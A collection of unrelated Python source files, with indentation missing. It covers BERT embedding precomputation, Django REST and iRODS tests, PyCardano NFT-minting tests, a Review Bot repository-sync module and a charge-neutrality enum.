with open(input_file, 'r') as fin:
batches = []
cur = 0
for i, line in enumerate(fin):
batches.append(line.strip())
if (i+1) % batch_size == 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
for j, embed in enumerate(embeddings):
embed = embed.cpu().numpy()
if fp16:
embed = embed.astype('float16')
writer.writerow({'embedding': embed.tolist()})
cur += 1
pbar.update(len(batches))
batches = []
if len(batches) > 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
for j, embed in enumerate(embeddings):
embed = embed.cpu().numpy()
if fp16:
embed = embed.astype('float16')
writer.writerow({'embedding': embed.tolist()})
cur += 1
fout.close()
def np_create_dataset(output_file, input_file, fp16=False):
global tokenizer, model, device
print(f'precompute embeddings for {input_file}')
pbar = tqdm()
# fout = open(output_file, 'w')
proc = subprocess.run(['wc', '-l', input_file], capture_output=True)
dstore_size = int(proc.stdout.decode('utf-8').split()[0])
dtype = 'float16' if fp16 else 'float32'
print(f'{dstore_size} examples')
dstore = np.memmap(output_file,
dtype=dtype,
mode='w+',
shape=(dstore_size, model.config.hidden_size),
)
with open(input_file, 'r') as fin:
batches = []
cur = 0
for i, line in enumerate(fin):
batches.append(line.strip())
if (i+1) % batch_size == 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
dstore[cur:cur+embeddings.size(0)] = embeddings.cpu().numpy().astype(dtype)
cur += embeddings.size(0)
assert model.config.hidden_size == embeddings.size(1)
pbar.update(len(batches))
batches = []
if len(batches) > 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
dstore[cur:cur+embeddings.size(0)] = embeddings.cpu().numpy().astype(dtype)
cur += embeddings.size(0)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='pre-compute the Bert embeddings')
parser.add_argument('dataset', type=str, help='the path to the dataset name')
parser.add_argument('--split', type=str, default=None,
help='if specified, only compute for this split')
parser.add_argument('--fp32', action='store_true', default=False,
help='whether to use half float point. It uses half float by default')
parser.add_argument('--sent-bert', action='store_true', default=False,
help='whether to use sentence-BERT')
args = parser.parse_args()
args.cuda = torch.cuda.is_available()
save_dir = f"precompute_embedding_datasets/{args.dataset}"
os.makedirs(save_dir, exist_ok=True)
device = "cuda" if args.cuda else "cpu"
model_name = 'bert-base-uncased' if not args.sent_bert else 'sentence-transformers/bert-base-nli-mean-tokens'
model_short = 'bert' if not args.sent_bert else 'sentbert'
model = AutoModel.from_pretrained(model_name)
tokenizer = AutoTokenizer.from_pretrained(model_name)
model.to(device)
model.eval()
gname_list = [args.split] if args.split is not None else ['valid', 'test', 'template', 'train']
batch_size = 128
for gname in gname_list:
if os.path.isfile(f'datasets/{args.dataset}/{gname}.txt'):
np_create_dataset(os.path.join(save_dir, f'{args.dataset}.{model_short}.{gname}.npy'),
os.path.join(f'datasets/{args.dataset}/{gname}.txt'), not args.fp32)
# for gname in gname_list:
# if os.path.isfile(f'datasets/{args.dataset}/{gname}.txt'):
# csv_create_dataset(os.path.join(save_dir, f'{args.dataset}.{model_short}.{gname}.csv.gz'),
# os.path.join(f'datasets/{args.dataset}/{gname}.txt'), args.fp16)
# for gname in gname_list:
# if os.path.isfile(f'datasets/{args.dataset}/{gname}.txt'):
# with h5py.File(os.path.join(save_dir, f'{args.dataset}.{model_short}.{gname}.hdf5'), 'w') as fout:
# hdf5_create_dataset(fout, os.path.join(f'datasets/{args.dataset}/{gname}.txt'))
|
105478
|
from __future__ import print_function
import sys
import shutil
import os
if sys.version_info >= (2, 7):
import unittest
else:
import unittest2 as unittest
import os
import datetime
import socket
from .. import test
from . import settings
from .. import lib
from . import resource_suite
from ..configuration import IrodsConfig
class Test_ClientHints(resource_suite.ResourceBase, unittest.TestCase):
def setUp(self):
super(Test_ClientHints, self).setUp()
def tearDown(self):
super(Test_ClientHints, self).tearDown()
def test_client_hints(self):
self.admin.assert_icommand('iclienthints', 'STDOUT_SINGLELINE', 'plugins')
|
105485
|
import datetime
from test_plus.test import TestCase
from qa_tool.tests.helpers import RelevancyScoreBuilder, AlgorithmBuilder, SearchLocationBuilder
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.test import APIClient
from human_services.services_at_location.tests.helpers import ServiceAtLocationBuilder
from newcomers_guide.tests.helpers import create_topic
from common.testhelpers.random_test_values import an_integer, a_string
class GETRelevancyScoreTests(TestCase):
def setUp(self):
self.user = self.make_user()
self.token = Token.objects.create(user=self.user)
self.APIClient = APIClient()
self.data = {
'value': an_integer(),
'algorithm': AlgorithmBuilder().create().id,
'search_location': SearchLocationBuilder().create().id,
'service_at_location': ServiceAtLocationBuilder().create().id,
'topic': create_topic(a_string()).id,
}
def test_can_get_one_entity_unauthenticated(self):
score_value = an_integer()
score = RelevancyScoreBuilder(self.user).with_value(score_value).create()
url = '/qa/v1/relevancyscores/{0}/'.format(score.pk)
response = self.APIClient.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['value'], score_value)
def test_can_get_entities_unauthenticated(self):
RelevancyScoreBuilder(self.user).create()
RelevancyScoreBuilder(self.user).create()
url = '/qa/v1/relevancyscores/'
response = self.APIClient.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.json()), 2)
def test_cannot_get_non_existent_entity_unauthenticated(self):
url = '/qa/v1/relevancyscores/0/'
response = self.APIClient.get(url)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class DELETERelevancyScoreTests(TestCase):
def setUp(self):
self.user = self.make_user()
self.token = Token.objects.create(user=self.user)
self.APIClient = APIClient()
self.data = {
'value': an_integer(),
'algorithm': AlgorithmBuilder().create().id,
'search_location': SearchLocationBuilder().create().id,
'service_at_location': ServiceAtLocationBuilder().create().id,
'topic': create_topic(a_string()).id,
}
def test_can_delete(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
score = RelevancyScoreBuilder(self.user).create()
url = '/qa/v1/relevancyscores/{0}/'.format(score.pk)
response = self.APIClient.delete(url)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_cannot_delete_unauthenticated(self):
score = RelevancyScoreBuilder(self.user).create()
url = '/qa/v1/relevancyscores/{0}/'.format(score.pk)
response = self.APIClient.delete(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_cannot_delete_non_existent_entity(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/0/'
response = self.APIClient.delete(url)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class PUTRelevancyScoreTests(TestCase):
def setUp(self):
self.user = self.make_user()
self.new_user = self.make_user(username='testuser2')
self.token = Token.objects.create(user=self.user)
self.APIClient = APIClient()
self.sample_score = RelevancyScoreBuilder(self.user).create()
self.data = {
'value': an_integer(),
'algorithm': AlgorithmBuilder().create().id,
'search_location': SearchLocationBuilder().create().id,
'service_at_location': ServiceAtLocationBuilder().create().id,
'topic': create_topic(a_string()).id,
}
def test_can_put_value(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
new_value = an_integer()
self.data['value'] = new_value
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['value'], new_value)
def test_can_put_algorithm(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
new_algorithm = AlgorithmBuilder().create()
self.data['algorithm'] = new_algorithm.id
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['algorithm'], new_algorithm.id)
def test_can_put_search_location(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
new_search_location = SearchLocationBuilder().create()
self.data['search_location'] = new_search_location.id
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['search_location'], new_search_location.id)
def test_can_put_service_at_location(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
new_service_at_location = ServiceAtLocationBuilder().create()
self.data['service_at_location'] = new_service_at_location.id
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['service_at_location'], new_service_at_location.id)
def test_can_put_topic(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
new_topic = create_topic(a_string())
self.data['topic'] = new_topic.id
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['topic'], new_topic.id)
def test_put_response_has_new_time_stamp(self):
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
recreated_time = datetime.datetime.strptime(response.json()['time_stamp'], '%Y-%m-%dT%H:%M:%S.%fZ')
self.assertLessEqual(recreated_time, datetime.datetime.now())
self.assertGreaterEqual(recreated_time + datetime.timedelta(seconds=1), datetime.datetime.now())
def test_can_put_with_different_credential(self):
new_token = Token.objects.create(user=self.new_user)
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + new_token.key)
new_value = an_integer()
self.data['value'] = new_value
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['user'], self.new_user.id)
self.assertEqual(response.json()['value'], new_value)
def test_cannot_put_id(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
new_id = an_integer()
self.data['id'] = new_id
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.json(), 'id of relevancyscore is immutable')
def test_cannot_put_user(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
self.data['user'] = self.new_user.id
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.json(), 'user_id of relevancyscore is immutable')
def test_cannot_put_unauthenticated(self):
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
self.data['value'] = an_integer()
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_cannot_put_non_existent_entity(self):
url = '/qa/v1/relevancyscores/0/'
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class POSTRelevancyScoreTests(TestCase):
def setUp(self):
self.user = self.make_user()
self.token = Token.objects.create(user=self.user)
self.APIClient = APIClient()
self.score_value = an_integer()
self.data_without_algorithm_in_body = {
'value': self.score_value,
'search_location': SearchLocationBuilder().create().id,
'service_at_location': ServiceAtLocationBuilder().create().id,
'topic': create_topic('test').id,
}
self.data_with_algorithm_in_body = {
'value': self.score_value,
'algorithm': AlgorithmBuilder().create().id,
'search_location': SearchLocationBuilder().create().id,
'service_at_location': ServiceAtLocationBuilder().create().id,
'topic': create_topic(a_string()).id,
}
def test_can_post_with_algorithm_in_body_not_in_url_short_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, data=self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.json()['value'], self.score_value)
def test_can_post_with_algorithm_in_url_not_in_body_long_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
algorithm = AlgorithmBuilder().create()
url = '/qa/v1/algorithms/{0}/relevancyscores/'.format(algorithm.pk)
response = self.APIClient.post(url, data=self.data_without_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.json()['value'], self.score_value)
def test_post_response_has_correct_algorithm(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.json()['algorithm'], self.data_with_algorithm_in_body['algorithm'])
def test_post_response_has_correct_search_location(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.json()['search_location'], self.data_with_algorithm_in_body['search_location'])
def test_post_response_has_correct_service_at_location(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.json()['service_at_location'],
self.data_with_algorithm_in_body['service_at_location'])
def test_post_response_has_correct_topic(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.json()['topic'], self.data_with_algorithm_in_body['topic'])
def test_post_response_has_correct_user(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.json()['user'], self.user.id)
def test_post_response_has_accurate_time_stamp(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
recreated_time = datetime.datetime.strptime(response.json()['time_stamp'], '%Y-%m-%dT%H:%M:%S.%fZ')
self.assertLessEqual(recreated_time, datetime.datetime.now())
self.assertGreaterEqual(recreated_time + datetime.timedelta(seconds=1), datetime.datetime.now())
def test_cannot_post_unauthenticated(self):
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, data=self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_cannot_post_with_invalid_algorithm_in_url_valid_algorithm_in_body_long_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/algorithms/0/relevancyscores/'
response = self.APIClient.post(url, data=self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_post_without_algorithm_in_body_or_url_short_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, data=self.data_without_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_post_with_invalid_algorithm_in_url_missing_algorithm_in_body_long_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/algorithms/0/relevancyscores/'
response = self.APIClient.post(url, data=self.data_without_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_post_with_algorithm_in_body_and_url_short_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
algorithm_id = self.data_with_algorithm_in_body['algorithm']
url = '/qa/v1/relevancyscores/{0}/'.format(algorithm_id)
response = self.APIClient.post(url, data=self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_cannot_post_with_algorithm_in_body_and_url_long_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
algorithm_id = self.data_with_algorithm_in_body['algorithm']
url = '/qa/v1/algorithms/{0}/relevancyscores/'.format(algorithm_id)
response = self.APIClient.post(url, data=self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_post_with_algorithm_in_url_not_in_body_short_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
algorithm_id = AlgorithmBuilder().create().id
url = '/qa/v1/relevancyscores/{0}/'.format(algorithm_id)
response = self.APIClient.post(url, data=self.data_without_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_cannot_post_when_missing_fields(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
bad_data = {
'value': an_integer(),
'algorithm': AlgorithmBuilder().create().id,
# 'search_location': missing search_location
'service_at_location': ServiceAtLocationBuilder().create().id,
'topic': create_topic(a_string()).id,
}
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, bad_data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
|
105506
|
import pathlib
import tempfile
import cbor2
from retry import retry
from pycardano import *
from .base import TestBase
class TestMint(TestBase):
@retry(tries=4, delay=6, backoff=2, jitter=(1, 3))
def test_mint(self):
address = Address(self.payment_vkey.hash(), network=self.NETWORK)
# Load payment keys or create them if they don't exist
def load_or_create_key_pair(base_dir, base_name):
skey_path = base_dir / f"{base_name}.skey"
vkey_path = base_dir / f"{base_name}.vkey"
if skey_path.exists():
skey = PaymentSigningKey.load(str(skey_path))
vkey = PaymentVerificationKey.from_signing_key(skey)
else:
key_pair = PaymentKeyPair.generate()
key_pair.signing_key.save(str(skey_path))
key_pair.verification_key.save(str(vkey_path))
skey = key_pair.signing_key
vkey = key_pair.verification_key
return skey, vkey
tempdir = tempfile.TemporaryDirectory()
PROJECT_ROOT = tempdir.name
root = pathlib.Path(PROJECT_ROOT)
# Create the directory if it doesn't exist
root.mkdir(parents=True, exist_ok=True)
"""Generate keys"""
key_dir = root / "keys"
key_dir.mkdir(exist_ok=True)
# Generate policy keys, which will be used when minting NFT
policy_skey, policy_vkey = load_or_create_key_pair(key_dir, "policy")
"""Create policy"""
# A policy that requires a signature from the policy key we generated above
pub_key_policy_1 = ScriptPubkey(policy_vkey.hash())
# A policy that requires a signature from the extended payment key
pub_key_policy_2 = ScriptPubkey(self.extended_payment_vkey.hash())
# A time policy that disallows token minting after 10000 seconds from last block
must_before_slot = InvalidHereAfter(self.chain_context.last_block_slot + 10000)
# Combine two policies using ScriptAll policy
policy = ScriptAll([pub_key_policy_1, pub_key_policy_2, must_before_slot])
# Calculate policy ID, which is the hash of the policy
policy_id = policy.hash()
"""Define NFT"""
my_nft = MultiAsset.from_primitive(
{
policy_id.payload: {
b"MY_NFT_1": 1, # Name of our NFT1 # Quantity of this NFT
b"MY_NFT_2": 1, # Name of our NFT2 # Quantity of this NFT
}
}
)
native_scripts = [policy]
"""Create metadata"""
# We need to create a metadata for our NFTs, so they could be displayed correctly by blockchain explorer
metadata = {
721: { # 721 refers to the metadata label registered for NFT standard here:
# https://github.com/cardano-foundation/CIPs/blob/master/CIP-0010/registry.json#L14-L17
policy_id.payload.hex(): {
"MY_NFT_1": {
"description": "This is my first NFT thanks to PyCardano",
"name": "PyCardano NFT example token 1",
"id": 1,
"image": "ipfs://QmRhTTbUrPYEw3mJGGhQqQST9k86v1DPBiTTWJGKDJsVFw",
},
"MY_NFT_2": {
"description": "This is my second NFT thanks to PyCardano",
"name": "PyCardano NFT example token 2",
"id": 2,
"image": "ipfs://QmRhTTbUrPYEw3mJGGhQqQST9k86v1DPBiTTWJGKDJsVFw",
},
}
}
}
# Place metadata in AuxiliaryData, the format acceptable by a transaction.
auxiliary_data = AuxiliaryData(AlonzoMetadata(metadata=Metadata(metadata)))
"""Build transaction"""
# Create a transaction builder
builder = TransactionBuilder(self.chain_context)
# Add our own address as the input address
builder.add_input_address(address)
# Since an InvalidHereAfter rule is included in the policy, we must specify time to live (ttl) for this transaction
builder.ttl = must_before_slot.after
# Set nft we want to mint
builder.mint = my_nft
# Set native script
builder.native_scripts = native_scripts
# Set transaction metadata
builder.auxiliary_data = auxiliary_data
# Calculate the minimum amount of lovelace that need to hold the NFT we are going to mint
min_val = min_lovelace(Value(0, my_nft), self.chain_context)
# Send the NFT to our own address
nft_output = TransactionOutput(address, Value(min_val, my_nft))
builder.add_output(nft_output)
# Build and sign transaction
signed_tx = builder.build_and_sign(
[self.payment_skey, self.extended_payment_skey, policy_skey], address
)
print("############### Transaction created ###############")
print(signed_tx)
print(signed_tx.to_cbor())
# Submit signed transaction to the network
print("############### Submitting transaction ###############")
self.chain_context.submit_tx(signed_tx.to_cbor())
self.assert_output(address, nft_output)
nft_to_send = TransactionOutput(
address,
Value(
20000000,
MultiAsset.from_primitive({policy_id.payload: {b"MY_NFT_1": 1}}),
),
)
builder = TransactionBuilder(self.chain_context)
builder.add_input_address(address)
builder.add_output(nft_to_send)
# Create final signed transaction
signed_tx = builder.build_and_sign([self.payment_skey], address)
print("############### Transaction created ###############")
print(signed_tx)
print(signed_tx.to_cbor())
# Submit signed transaction to the network
print("############### Submitting transaction ###############")
self.chain_context.submit_tx(signed_tx.to_cbor())
self.assert_output(address, nft_to_send)
@retry(tries=4, delay=6, backoff=2, jitter=(1, 3))
def test_mint_nft_with_script(self):
address = Address(self.payment_vkey.hash(), network=self.NETWORK)
with open("./plutus_scripts/fortytwo.plutus", "r") as f:
script_hex = f.read()
forty_two_script = cbor2.loads(bytes.fromhex(script_hex))
policy_id = plutus_script_hash(forty_two_script)
my_nft = MultiAsset.from_primitive(
{
policy_id.payload: {
b"MY_SCRIPT_NFT_1": 1, # Name of our NFT1 # Quantity of this NFT
b"MY_SCRIPT_NFT_2": 1, # Name of our NFT2 # Quantity of this NFT
}
}
)
metadata = {
721: {
policy_id.payload.hex(): {
"MY_SCRIPT_NFT_1": {
"description": "This is my first NFT thanks to PyCardano",
"name": "PyCardano NFT example token 1",
"id": 1,
"image": "ipfs://QmRhTTbUrPYEw3mJGGhQqQST9k86v1DPBiTTWJGKDJsVFw",
},
"MY_SCRIPT_NFT_2": {
"description": "This is my second NFT thanks to PyCardano",
"name": "PyCardano NFT example token 2",
"id": 2,
"image": "ipfs://QmRhTTbUrPYEw3mJGGhQqQST9k86v1DPBiTTWJGKDJsVFw",
},
}
}
}
# Place metadata in AuxiliaryData, the format acceptable by a transaction.
auxiliary_data = AuxiliaryData(AlonzoMetadata(metadata=Metadata(metadata)))
# Create a transaction builder
builder = TransactionBuilder(self.chain_context)
# Add our own address as the input address
builder.add_input_address(address)
# Add minting script with an empty datum and a minting redeemer
builder.add_minting_script(
forty_two_script, redeemer=Redeemer(RedeemerTag.MINT, 42)
)
# Set nft we want to mint
builder.mint = my_nft
# Set transaction metadata
builder.auxiliary_data = auxiliary_data
# Calculate the minimum amount of lovelace that need to hold the NFT we are going to mint
min_val = min_lovelace(Value(0, my_nft), self.chain_context)
# Send the NFT to our own address
nft_output = TransactionOutput(address, Value(min_val, my_nft))
builder.add_output(nft_output)
# Create a collateral
self.fund(address, self.payment_skey, address)
non_nft_utxo = None
for utxo in self.chain_context.utxos(str(address)):
# multi_asset should be empty for collateral utxo
if not utxo.output.amount.multi_asset:
non_nft_utxo = utxo
break
builder.collaterals.append(non_nft_utxo)
# Build and sign transaction
signed_tx = builder.build_and_sign([self.payment_skey], address)
# signed_tx.transaction_witness_set.plutus_data
print("############### Transaction created ###############")
print(signed_tx)
print(signed_tx.to_cbor())
# Submit signed transaction to the network
print("############### Submitting transaction ###############")
self.chain_context.submit_tx(signed_tx.to_cbor())
self.assert_output(address, nft_output)
|
105511
|
def pytest_configure():
import os
os.environ.setdefault('SUPERTOKENS_ENV', 'testing')
os.environ.setdefault('SUPERTOKENS_PATH', '../supertokens-root')
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tests.Django.settings')
|
105538
|
from __future__ import unicode_literals
import os
import appdirs
from reviewbot.config import config
from reviewbot.utils.api import get_api_root
from reviewbot.utils.filesystem import make_tempdir
from reviewbot.utils.log import get_logger
from reviewbot.utils.process import execute
logger = get_logger(__name__)
repositories = {}
class Repository(object):
"""A repository."""
def sync(self):
"""Sync the latest state of the repository."""
pass
class GitRepository(Repository):
"""A git repository."""
def __init__(self, name, clone_path):
"""Initialize the repository.
Args:
name (unicode):
The configured name of the repository.
clone_path (unicode):
The path of the git remote to clone.
"""
self.name = name
self.clone_path = clone_path
self.repo_path = os.path.join(appdirs.site_data_dir('reviewbot'),
'repositories', name)
def sync(self):
"""Sync the latest state of the repository."""
if not os.path.exists(self.repo_path):
os.makedirs(self.repo_path)
logger.info('Cloning repository %s to %s',
self.clone_path, self.repo_path)
execute(['git', 'clone', '--bare', self.clone_path,
self.repo_path])
else:
logger.info('Fetching into existing repository %s',
self.repo_path)
execute(['git', '--git-dir=%s' % self.repo_path, 'fetch',
'origin', '+refs/heads/*:refs/heads/*', '--prune'])
def checkout(self, commit_id):
"""Check out the given commit.
Args:
commit_id (unicode):
The ID of the commit to check out.
Returns:
unicode:
The name of a directory with the given checkout.
"""
workdir = make_tempdir()
branchname = 'br-%s' % commit_id
logger.info('Creating temporary branch for clone in repo %s',
self.repo_path)
execute(['git', '--git-dir=%s' % self.repo_path, 'branch', branchname,
commit_id])
logger.info('Creating working tree for commit ID %s in %s', commit_id,
workdir)
execute(['git', 'clone', '--local', '--no-hardlinks', '--depth', '1',
'--branch', branchname, self.repo_path, workdir])
logger.info('Removing temporary branch for clone in repo %s',
self.repo_path)
execute(['git', '--git-dir=%s' % self.repo_path, 'branch', '-d',
branchname])
return workdir
class HgRepository(Repository):
"""A hg repository."""
def __init__(self, name, clone_path):
"""Initialize the repository.
Args:
name (unicode):
The configured name of the repository.
clone_path (unicode):
The path of the hg repository to clone.
"""
self.name = name
self.clone_path = clone_path
self.repo_path = os.path.join(appdirs.site_data_dir('reviewbot'),
'repositories', name)
def sync(self):
"""Sync the latest state of the repository."""
if not os.path.exists(self.repo_path):
os.makedirs(self.repo_path)
logger.info('Cloning repository %s to %s',
self.clone_path, self.repo_path)
execute(['hg', 'clone', '-U', self.clone_path,
self.repo_path])
else:
logger.info('Pulling into existing repository %s',
self.repo_path)
execute(['hg', '-R', self.repo_path, 'pull'])
def checkout(self, commit_id):
"""Check out the given commit.
Args:
commit_id (unicode):
The ID of the commit to check out.
Returns:
unicode:
The name of a directory with the given checkout.
"""
workdir = make_tempdir()
logger.info('Creating working tree for commit ID %s in %s', commit_id,
workdir)
execute(['hg', '-R', self.repo_path, 'archive', '-r', commit_id,
'-t', 'files', workdir])
return workdir
def fetch_repositories(url, user=None, token=None):
"""Fetch repositories from Review Board.
Args:
url (unicode):
The configured url for the connection.
user (unicode):
The configured user for the connection.
token (unicode):
The configured API token for the user.
"""
logger.info('Fetching repositories from Review Board: %s', url)
root = get_api_root(url=url,
username=user,
api_token=token)
for tool_type in ('Mercurial', 'Git'):
repos = root.get_repositories(tool=tool_type, only_links='',
only_fields='path,mirror_path,name')
for repo in repos.all_items:
repo_source = None
for path in (repo.path, repo.mirror_path):
if (os.path.exists(path) or path.startswith('http') or
path.startswith('git')):
repo_source = path
break
if repo_source:
init_repository(repo.name, tool_type.lower(), repo_source)
else:
logger.warning('Cannot find usable path for repository: %s',
repo.name)
def init_repository(repo_name, repo_type, repo_source):
"""Add repository entry to global list.
Args:
repo_name (unicode):
The name of the repository.
repo_type (unicode):
The type of the repository.
repo_source (unicode):
The source of the repository.
"""
global repositories
if repo_type == 'git':
repositories[repo_name] = \
GitRepository(repo_name, repo_source)
elif repo_type in ('hg', 'mercurial'):
repositories[repo_name] = \
HgRepository(repo_name, repo_source)
else:
logger.error('Unknown type "%s" for configured repository %s',
repo_type, repo_name)
def init_repositories():
"""Set up configured repositories."""
for server in config['reviewboard_servers']:
fetch_repositories(server['url'],
server.get('user'),
server.get('token'))
for repository in config['repositories']:
repo_name = repository['name']
repo_type = repository.get('type')
repo_source = repository['clone_path']
init_repository(repo_name, repo_type, repo_source)
|
105570
|
from .pylspm import PyLSpm
from .results import PyLSpmHTML
from .boot import PyLSboot
from .rebus import rebus
from .blindfolding import blindfolding
from .bootstraping import bootstrap
from .mga import mga
from .gac import gac
from .pso import pso
from .tabu2 import tabu
from .permuta import permuta
from .plsr2 import plsr2, HOCcat
from .monteCholesky import monteCholesky
from .adequacy import *
from .test_heuristic import *
from .fimix import fimixPLS
from .imputation import Imputer
|
105578
|
from typing import Tuple
from enum import Enum
class NeutralChargeRule(Enum):
"""
Strict enumeration of different methods to maintain charge neutrality for single residues.
"""
# Ions will not be used to neutralize system. This means OpenMM will add a neutralizing background charge.
NO_IONS = 0
# Inserted ions will be countered, and removed ions will be accompanied by removing a counter charge.
COUNTER_IONS = 1
# Removed charges will be replaced, and added charges will replace a charge in solvent.
REPLACEMENT_IONS = 2
def choose_neutralizing_ions_by_method(
reference_state_charge: int, to_state_charge: int, rule: NeutralChargeRule
) -> Tuple[int, int]:
"""Pick ions using specific rule for single residue changes.
Notes
-----
To ensure consistency, for multiple changes, calculate result for individual residues separately and sum up the
delta ion results.
Parameters
----------
